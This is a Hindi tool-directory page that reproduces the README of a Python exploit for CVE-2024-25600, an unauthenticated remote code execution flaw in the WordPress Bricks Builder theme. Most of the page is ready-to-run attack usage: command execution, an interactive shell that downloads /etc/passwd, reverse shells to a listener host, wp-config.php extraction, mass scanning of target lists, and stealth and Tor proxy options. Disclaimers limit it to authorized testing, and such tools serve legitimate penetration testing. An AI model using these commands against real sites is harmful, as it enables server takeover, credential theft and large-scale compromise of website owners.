Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only. | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
ReconnaissanceVulnerability ScannersExploitationShellcodeWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed Teaming

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
Payload Development
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

विवरण

CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only.

साझा करें

BricksRCE एक्सप्लॉइटर

CVE-2024-25600 — WordPress Bricks Builder अनप्रमाणित RCE

Python Version CVSS CVE License Platform

CVE-2024-25600 के लिए अधिकृत सुरक्षा मूल्यांकन उपकरण
लेखक: सुदीपा वानिगरथना · उपकरण: BricksRCE एक्सप्लॉइटर v1.0
मुख्य स्क्रिप्ट: cve-2024-25600.py

b

[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन प्रणालियों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक दुरुपयोग से उत्पन्न किसी भी देयता को स्वीकार नहीं करता है।


विषय-सूची

  • अवलोकन
  • कमजोरी विवरण
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग गाइड
  • कमांड संदर्भ
  • इंटरैक्टिव शेल
  • आउटपुट और लॉगिंग
  • समस्या निवारण
  • रिपॉजिटरी संरचना
  • संस्करण इतिहास
  • अस्वीकरण
  • लेखक और श्रेय
  • लाइसेंस

अवलोकन

CVE-2024-25600 WordPress Bricks Builder थीम में एक गंभीर, अनप्रमाणित दूरस्थ कोड निष्पादन कमजोरी है। render_element REST एंडपॉइंट में उपयोगकर्ता-नियंत्रित इनपुट के अनुचित हैंडलिंग के कारण, अनप्रमाणित हमलावर प्रभावित इंस्टॉलेशन पर मनमाना PHP/सिस्टम कमांड निष्पादित कर सकते हैं।

BricksRCE एक्सप्लॉइटर (cve-2024-25600.py) अधिकृत सुरक्षा पेशेवरों के लिए एक पूर्ण-विशेषताओं वाला Python मूल्यांकन उपकरण है, जो:

  • कमजोर Bricks Builder इंस्टॉलेशन का पता लगाए
  • नियंत्रित कमांड निष्पादन के साथ प्रभाव की पुष्टि करे
  • इंटरैक्टिव शेल के माध्यम से समझौता किए गए होस्ट के साथ संवाद करे
  • एसिंक/थ्रेडेड वर्कर्स के साथ लक्ष्य सूचियों का बड़े पैमाने पर स्कैन करे
  • रिपोर्टिंग के लिए संरचित परिणाम निर्यात करे

कमजोरी विवरण

प्रभावित एंडपॉइंट

एंडपॉइंटविधि
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

हमला सारांश

  1. लक्ष्य पेज स्रोत से एक Bricks nonce निकालें
  2. एक दुर्भावनापूर्ण तत्व पेलोड के साथ रचित render_element अनुरोध सबमिट करें
  3. सर्वर-साइड कोड मूल्यांकन मनमाना कमांड निष्पादन की ओर ले जाता है

संदर्भ

  • CVE-2024-25600 (MITRE)
  • NVD प्रविष्टि
  • Bricks Builder चेंजलॉग / सुरक्षा सलाह

विशेषताएँ

मुख्य क्षमताएँ

परिचालन नियंत्रण

रिपोर्टिंग

क्षमताविवरण
JSON / TXT निर्यातस्कैन परिणाम और कमजोर लक्ष्य सहेजें
कमांड इतिहासनिष्पादित कमांड का वैकल्पिक लॉगिंग
फ़ाइल लॉगिंगस्थायी bricks_rce.log और कस्टम लॉग पथ

स्थापना

आवश्यक शर्तें

  • Python 3.8+
  • pip
  • अधिकृत लक्ष्य(ों) तक नेटवर्क पहुँच

सेटअप

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

निर्भरताएँ

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # वैकल्पिक — SOCKS5 प्रॉक्सी समर्थन

त्वरित प्रारंभ

https://target.example को केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।

root@kitploit:~
# इंटरैक्टिव शेल
python3 cve-2024-25600.py -u https://target.example

# एकल कमांड
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# बड़े पैमाने पर स्कैन
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# संस्करण पता लगाना
python3 cve-2024-25600.py -u https://target.example --detect-version

# Burp प्रॉक्सी के माध्यम से
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

उपयोग गाइड

सभी उदाहरण मुख्य स्क्रिप्ट cve-2024-25600.py का उपयोग करते हैं

1. सहायता दिखाएँ

root@kitploit:~
python3 cve-2024-25600.py --help

2. एकल-लक्ष्य इंटरैक्टिव शेल

लक्ष्य के कमजोर होने की पुष्टि के बाद एक इंटरैक्टिव RCE शेल खोलता है।

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

कार्यप्रवाह:

  1. URL को सामान्यीकृत और मान्य करें
  2. पेज से nonce निकालें
  3. कमजोरी सत्यापित करें (जब तक --force न हो)
  4. इंटरैक्टिव शेल में प्रवेश करें

3. एकल कमांड निष्पादित करें

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

कमांड आउटपुट को फ़ाइल में सहेजें:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. पेलोड प्रकार चुनें

root@kitploit:~
# डिफ़ॉल्ट PHP अपवाद-आधारित पेलोड
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() आधारित पेलोड
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Bricks Builder संस्करण का पता लगाएँ

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

कमांड के साथ संयोजित करें:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. wp-config.php निकालें

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

सफलता पर wp-config_<target>.txt के रूप में सहेजा जाता है।

7. रिवर्स शेल (केवल अधिकृत प्रयोगशाला)

root@kitploit:~
# टर्मिनल 1 — श्रोता
nc -lvnp 4444

# टर्मिनल 2 — bash रिवर्स शेल
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

सभी समर्थित रिवर्स शेल प्रकार:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. फ़ोर्स मोड (कमजोरी जांच छोड़ें)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. फ़ाइल से बड़े पैमाने पर स्कैनिंग

root@kitploit:~
# targets.txt — प्रति पंक्ति एक URL
python3 cve-2024-25600.py -f targets.txt

थ्रेड, विलंब, स्टील्थ और JSON आउटपुट के साथ:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

एसिंक के बजाय सिंक्रोनस (थ्रेड-पूल) स्कैनिंग:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

शांत बड़े पैमाने पर स्कैन:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. एंडपॉइंट चयन

root@kitploit:~
# दोनों एंडपॉइंट (डिफ़ॉल्ट)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# केवल /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# केवल /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. स्टील्थ मोड

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. कस्टम User-Agent

root@kitploit:~
# कस्टम UA
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# यादृच्छिक UA रोटेशन अक्षम करें
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. प्रॉक्सी समर्थन

root@kitploit:~
# HTTP प्रॉक्सी (जैसे Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# SOCKS5 प्रॉक्सी
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (प्रॉक्सी / Tor के माध्यम से DNS)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. SSL सत्यापन

root@kitploit:~
# SSL प्रमाणपत्र सत्यापन सक्षम करें (डिफ़ॉल्ट रूप से अक्षम)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. आउटपुट और लॉगिंग

root@kitploit:~
# स्कैन परिणाम JSON के रूप में सहेजें
python3 cve-2024-25600.py -f targets.txt -o results.json

# स्कैन परिणाम TXT के रूप में सहेजें
python3 cve-2024-25600.py -f targets.txt -o results.txt

# कस्टम एप्लिकेशन लॉग फ़ाइल
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# निष्पादित कमांड लॉग करें
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. वर्बोज़ और शांत मोड

root@kitploit:~
# वर्बोज़ / डीबग लॉगिंग
python3 cve-2024-25600.py -u https://target.example -v

# शांत मोड (न्यूनतम आउटपुट)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. प्रदर्शन ट्यूनिंग

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. संयुक्त पूर्ण मूल्यांकन उदाहरण

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. इंटरैक्टिव शेल में निर्मित कमांड

-u के साथ शुरू करने के बाद (बिना --cmd / --reverse-shell):

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

कमांड संदर्भ

लक्ष्य विकल्प

तर्कविवरण
-u, --urlएकल लक्ष्य URL
-f, --fileलक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)

स्कैनिंग विकल्प

स्टील्थ विकल्प

शोषण विकल्प

आउटपुट विकल्प


इंटरैक्टिव शेल

जब --cmd या --reverse-shell के बिना एकल लक्ष्य का शोषण किया जाता है, तो एक इंटरैक्टिव शेल खुलता है:

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

निर्मित कमांड

विशेषताएँ

  • कमांड इतिहास ~/.bricks_rce_history में संग्रहीत
  • सामान्य कमांड के लिए ऑटोकम्प्लीट
  • इतिहास से स्वतः-सुझाव (prompt-toolkit)

आउटपुट और लॉगिंग

कंसोल

Rich-संचालित पैनल, प्रोग्रेस बार और परिणाम तालिकाएँ:

root@kitploit:~
[*] Testing: https://target.example
[+] https://target.example is vulnerable!
[+] Interactive shell opened successfully

स्कैन परिणाम तालिका

JSON निर्यात (-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

लॉग फ़ाइलें

फ़ाइलउद्देश्य
bricks_rce.logडिफ़ॉल्ट केवल-जोड़ें एप्लिकेशन लॉग
--log-file PATHअतिरिक्त कस्टम लॉग हैंडलर
--command-log PATHनिष्पादित कमांड ऑडिट ट्रेल

समस्या निवारण

डीबग कार्यप्रवाह

root@kitploit:~
# वर्बोज़ एकल-लक्ष्य जाँच
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# अनुरोध निरीक्षण के लिए Burp के माध्यम से
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# किसी विशिष्ट एंडपॉइंट को प्राथमिकता दें
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

रिपॉजिटरी संरचना

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE एक्सप्लॉइटर (v1.0)
├── requirements.txt      # Python निर्भरताएँ
├── README.md             # यह फ़ाइल
├── bricks_rce.log        # रनटाइम लॉग (उत्पन्न)
└── venv/                 # स्थानीय वर्चुअलएनवी (वैकल्पिक, कमिट नहीं)

संस्करण इतिहास

v1.0.0 — प्रारंभिक रिलीज़

  • CVE-2024-25600 के लिए अनप्रमाणित RCE पहचान और शोषण
  • बहु-विधि nonce निष्कर्षण
  • अपलोड / डाउनलोड के साथ इंटरैक्टिव शेल
  • एकल-कमांड और रिवर्स-शेल मोड
  • एसिंक / थ्रेडेड बड़े पैमाने पर स्कैनिंग
  • संस्करण पता लगाना और wp-config निष्कर्षण
  • स्टील्थ मोड, UA रोटेशन, प्रॉक्सी समर्थन
  • JSON/TXT परिणाम निर्यात के साथ समृद्ध CLI

अस्वीकरण

यह परियोजना जैसी है रक्षात्मक सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए प्रदान की गई है।

इस सॉफ़्टवेयर का उपयोग करके आप सहमत हैं कि:

  1. आप केवल उन प्रणालियों को लक्षित करेंगे जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपको स्पष्ट रूप से अधिकृत किया गया है।
  2. आप लागू कंप्यूटर-दुरुपयोग और डेटा-सुरक्षा कानूनों को समझते हैं।
  3. लेखक और योगदानकर्ता दुरुपयोग से होने वाली क्षति, डेटा हानि, या कानूनी परिणामों के लिए जिम्मेदार नहीं हैं।

यदि आप अपने स्वामित्व वाले उत्पादन वातावरण में इस कमजोरी की खोज करते हैं, तो जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और साइट स्वामी / Bricks Builder सुरक्षा टीम के साथ समन्वय करें।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच एक संघीय अपराध है।


लेखक और श्रेय


लाइसेंस

root@kitploit:~
MIT लाइसेंस

कॉपीराइट (c) 2024–2026 सुदीपा वानिगरथना

इसके द्वारा, किसी भी व्यक्ति को इस सॉफ़्टवेयर और संबंधित दस्तावेज़ फ़ाइलों ("सॉफ़्टवेयर") की एक प्रति प्राप्त करने पर, बिना किसी प्रतिबंध के सॉफ़्टवेयर में कार्य करने की अनुमति निःशुल्क प्रदान की जाती है, जिसमें बिना किसी सीमा के, सॉफ़्टवेयर का उपयोग, प्रतिलिपि, संशोधन, विलय, प्रकाशन, वितरण, उप-लाइसेंस, और/या बेचने के अधिकार, और उन व्यक्तियों को ऐसा करने की अनुमति देना शामिल है जिन्हें सॉफ़्टवेयर प्रदान किया गया है, निम्नलिखित शर्तों के अधीन:

उपरोक्त कॉपीराइट नोटिस और यह अनुमति नोटिस सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल किया जाएगा।

सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, स्पष्ट या निहित, जिसमें व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और उल्लंघन की गारंटी शामिल है लेकिन इन्हीं तक सीमित नहीं है। किसी भी स्थिति में लेखक या कॉपीराइट धारक किसी भी दावे, क्षति या अन्य देयता के लिए उत्तरदायी नहीं होंगे, चाहे वह अनुबंध, अपकृत्य या किसी अन्य सिद्धांत पर आधारित हो, जो सॉफ़्टवेयर या सॉफ़्टवेयर के उपयोग या अन्य लेन-देन से उत्पन्न होता है।

समर्थन

  • यदि यह आपके अधिकृत शोध में सहायक हो तो रिपॉजिटरी को स्टार करें
  • बग, गलत सकारात्मकता या पहचान सुधार के लिए मुद्दे खोलें
  • दस्तावेज़ीकरण और अधिकृत-प्रयोगशाला UX के लिए पुल अनुरोधों का स्वागत है

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें
विशेषतामान
CVE IDCVE-2024-25600
CVSS9.8 (गंभीर)
हमला वेक्टरनेटवर्क — अनप्रमाणित
प्रभावपूर्ण दूरस्थ कोड निष्पादन, गोपनीयता / अखंडता / उपलब्धता से समझौता
प्रभावित उत्पादWordPress Bricks Builder थीम
प्रभावित संस्करणBricks ≤ 1.9.6 (1.9.6.1+ में पैच किया गया)
कमजोरी प्रकारअनप्रमाणित दूरस्थ कोड निष्पादन
CWECWE-94 (कोड उत्पादन का अनुचित नियंत्रण)
क्षमताविवरण
कमजोरी का पता लगानानियंत्रित मार्कर-आधारित जांच के माध्यम से RCE की पुष्टि
Nonce निष्कर्षणबहु-विधि nonce खोज (स्क्रिप्ट, पेज स्रोत, मेटा, REST)
संस्करण का पता लगानाCSS / readme / REST से Bricks Builder संस्करण की पहचान
इंटरैक्टिव शेलइतिहास, ऑटोकम्प्लीट और फ़ाइल स्थानांतरण के साथ पूर्ण REPL
एकल-कमांड मोडएक कमांड निष्पादित करें और बाहर निकलें (स्क्रिप्टिंग के अनुकूल)
रिवर्स शेल सहायकbash / nc / Python / PHP / Perl / Ruby रिवर्स शेल उत्पन्न करें
wp-config निष्कर्षणwp-config.php का पता लगाने और पढ़ने का प्रयास
बड़े पैमाने पर स्कैनिंगURL सूची से एसिंक या थ्रेडेड बहु-लक्ष्य स्कैनिंग
क्षमताविवरण
दर सीमित करनाअनुरोधों के बीच कॉन्फ़िगर करने योग्य विलंब
पुनर्प्रयास तर्कटाइमआउट और कनेक्शन त्रुटियों पर एक्सपोनेंशियल बैकऑफ़
User-Agent रोटेशनप्रति अनुरोध यादृच्छिक ब्राउज़र फ़िंगरप्रिंट
स्टील्थ मोडयादृच्छिक Accept-Language / Accept-Encoding हेडर
प्रॉक्सी समर्थनHTTP, HTTPS, SOCKS5 / SOCKS5h
दोहरे एंडपॉइंटwp-json, rest_route, या दोनों को प्राथमिकता दें
फ़ोर्स मोडप्री-चेक छोड़ें और सीधे शोषण का प्रयास करें
समृद्ध CLIRich के माध्यम से प्रोग्रेस बार, टेबल और रंगीन पैनल
तर्कडिफ़ॉल्टविवरण
-t, --threads10बड़े पैमाने पर स्कैन के लिए समवर्ती वर्कर
--delay0.5अनुरोधों के बीच विलंब (सेकंड)
--timeout15HTTP अनुरोध टाइमआउट (सेकंड)
--max-retries3विफलता पर पुनर्प्रयास प्रयास
--forceबंदकमजोरी जांच छोड़ें
--syncबंदएसिंक के बजाय थ्रेड पूल का उपयोग करें
तर्कविवरण
--user-agentकस्टम User-Agent स्ट्रिंग
--no-random-uaUser-Agent रोटेशन अक्षम करें
--proxyप्रॉक्सी URL (http://, https://, socks5://, socks5h://)
--stealthस्टील्थ मोड सक्षम करें (यादृच्छिक हेडर + विलंब)
--endpointjson | rest_route | both (डिफ़ॉल्ट: both)
तर्कविवरण
--cmdएकल कमांड निष्पादित करें और बाहर निकलें
--payloadपेलोड प्रकार: php (डिफ़ॉल्ट) या system
--reverse-shellशेल प्रकार: bash, nc, python, php, perl, ruby
--lhostरिवर्स शेल के लिए श्रोता होस्ट
--lportरिवर्स शेल के लिए श्रोता पोर्ट
--extract-wp-configwp-config.php निकालने का प्रयास
--detect-versionBricks Builder संस्करण का पता लगाएँ
--save-outputएकल-कमांड आउटपुट को फ़ाइल में सहेजें
तर्कविवरण
-o, --outputपरिणाम फ़ाइल (.json या .txt)
--log-fileकस्टम विस्तृत लॉग पथ
--command-logनिष्पादित कमांड को फ़ाइल में लॉग करें
-v, --verboseडीबग लॉगिंग
-q, --quietन्यूनतम कंसोल आउटपुट
--verify-sslSSL प्रमाणपत्र सत्यापन सक्षम करें (डिफ़ॉल्ट रूप से बंद)
कमांडविवरण
exitशेल से बाहर निकलें
helpसहायता दिखाएँ
clearस्क्रीन साफ़ करें
download [remote]दूरस्थ फ़ाइल डाउनलोड करें (base64 स्थानांतरण)
upload [local] [remote]स्थानीय फ़ाइल को लक्ष्य पर अपलोड करें
php [cmd]PHP पेलोड के माध्यम से निष्पादित करें (डिफ़ॉल्ट)
system [cmd]system() पेलोड के माध्यम से निष्पादित करें
मीट्रिकविवरण
कुल संसाधितस्कैन किए गए URL
सफलकमजोर पुष्टि की गई
असफलगैर-कमजोर / अप्राप्य
कमजोर पाए गएपुष्टि किए गए RCE लक्ष्यों की संख्या
निष्पादित कमांडकुल RCE कमांड रन
बीता हुआ समयदीवार-घड़ी स्कैन अवधि
लक्षणक्या प्रयास करें
Nonce नहीं मिलापुष्टि करें कि Bricks सक्रिय है; -v आज़माएँ; सुनिश्चित करें कि फ्रंट पेज लोड होता है
लक्ष्य कमजोर नहीं हैBricks ≤ 1.9.6 सत्यापित करें; --force आज़माएँ; दोनों एंडपॉइंट जाँचें
कनेक्शन टाइमआउट--timeout / --max-retries बढ़ाएँ; प्रॉक्सी जाँचें
दर सीमित (429)--delay बढ़ाएँ; --stealth सक्षम करें
SSL त्रुटियाँडिफ़ॉल्ट सत्यापन छोड़ता है; केवल आवश्यक होने पर --verify-ssl का उपयोग करें
Async अस्थिरताथ्रेडेड स्कैनिंग के लिए --sync का उपयोग करें
रिवर्स शेल विफलपुष्टि करें कि श्रोता चालू है; वैकल्पिक शेल प्रकार आज़माएँ (python, nc)
खाली कमांड आउटपुटकमांड बिना stdout के सफल हो सकता है; echo test आज़माएँ
wp-config नहीं मिलापथ होस्ट के अनुसार भिन्न होते हैं; कस्टम find / cat के साथ इंटरैक्टिव शेल का उपयोग करें
भूमिकानाम
उपकरण लेखकसुदीपा वानिगरथना
CVECVE-2024-25600
उपकरणBricksRCE एक्सप्लॉइटर v1.0
मुख्य स्क्रिप्टcve-2024-25600.py
लाइसेंसMIT